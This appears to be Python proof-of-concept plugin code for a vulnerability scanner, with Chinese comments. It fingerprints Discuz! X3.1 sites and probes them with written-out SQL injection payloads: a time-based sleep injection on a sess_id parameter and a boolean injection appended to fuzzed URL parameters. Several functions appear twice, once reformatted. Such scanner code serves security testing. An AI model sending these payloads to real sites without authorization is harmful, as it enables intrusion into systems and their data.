def fingerprint(self, target):
url = target
host = util.getHostByUrl(url)
code, head, body, location, error = util.sendHttpRequest(host)
if code == 200:
if re.search("<p>Powered by <strong><a href=\"http://www.discuz.net\">Discuz!</a></strong> <em>X3.1</em></p>", body):
# 目标站点为discuz X3.1框架,适用于本poc,可以扫描"
return True
else:
return False
def fingerprint(self, target):
url = target
host = util.getHostByUrl(url)
code, head, body, location, error = util.sendHttpRequest(host)
if code == 200:
if re.search("<p>Powered by <strong><a href=\"http://www.discuz.net\">Discuz!</a></strong> <em>X3.1</em></p>", body):
# 目标站点为discuz X3.1框架,适用于本poc,可以扫描"
return True
else:
return False
def audit(self, target):
urlWithPayload = util.getHostByUrl(target) + '/test.php?act=login&sess_id=1%27%20and%20sleep%283%29--%201'
start = time.clock()
code, head, body, location, error = util.sendHttpRequest(urlWithPayload)
if code == 200:
if body.find('<b>Warning</b>: INSERT INTO') != -1 or time.clock() - start in range(1, 3):
# 发现漏洞,通过调用基类的_addScanResult()方法来保存结果。可多次调用_addScanResult()来保存多个漏洞结果。
self._addScanResult({"method": "GET", # http请求的类型 GET/POST/HEAD
"post_data": "", # 如果请求为POST,则为包含payload的POST数据
"url": urlWithPayload, # 含有payload的url
"vul_key": "sess_id"}) # 存在漏洞点的参数
return True
return False
def fuzz(self, context):
url = context["url"] # 需要fuzz的url,假设为http://www.test.com/index.php?a=aaa&b=bbb&c=ccc
param = context["param"] # 需要fuzz的param,假设为b
payload = "1'+and+'1'%3d'1"
urlWithPayload = util.fillPayload(url, param, payload, isAppend=True)
# 装填payload到url的指定参数上,isAppend为True,则payload追加在原有参数值后,否则直接覆盖掉原有参数值
# 装填结果为 http://www.test.com/index.php?a=aaa&b=bbb1'+and+'1'%3d'1&c=ccc
code, head, body, location, error = util.sendHttpRequest(urlWithPayload)
if code == 200:
if re.search("\w?SQL Error\w?", body):
# 发现漏洞,通过调用基类的_addScanResult()方法来保存结果。可多次调用_addScanResult()来保存多个漏洞结果。
self._addScanResult({"method": context["method"],
"post_data": context["post_data"],
"url": urlWithPayload, # 含有payload的url
"vul_key": context["param"]}) # 存在漏洞点的参数
return True
return False
def fuzz(self, context):
url = context[
"url"] # 需要fuzz的url,假设为http://www.test.com/index.php?a=aaa&b=bbb&c=ccc
param = context["param"] # 需要fuzz的param,假设为b
payload = "1'+and+'1'%3d'1"
urlWithPayload = util.fillPayload(url, param, payload, isAppend=True)
# 装填payload到url的指定参数上,isAppend为True,则payload追加在原有参数值后,否则直接覆盖掉原有参数值
# 装填结果为 http://www.test.com/index.php?a=aaa&b=bbb1'+and+'1'%3d'1&c=ccc
code, head, body, location, error = util.sendHttpRequest(
urlWithPayload)
if code == 200:
if re.search("\w?SQL Error\w?", body):
# 发现漏洞,通过调用基类的_addScanResult()方法来保存结果。可多次调用_addScanResult()来保存多个漏洞结果。
self._addScanResult({
"method": context["method"],
"post_data": context["post_data"],
"url": urlWithPayload, # 含有payload的url
"vul_key": context["param"]
}) # 存在漏洞点的参数
return True
return False
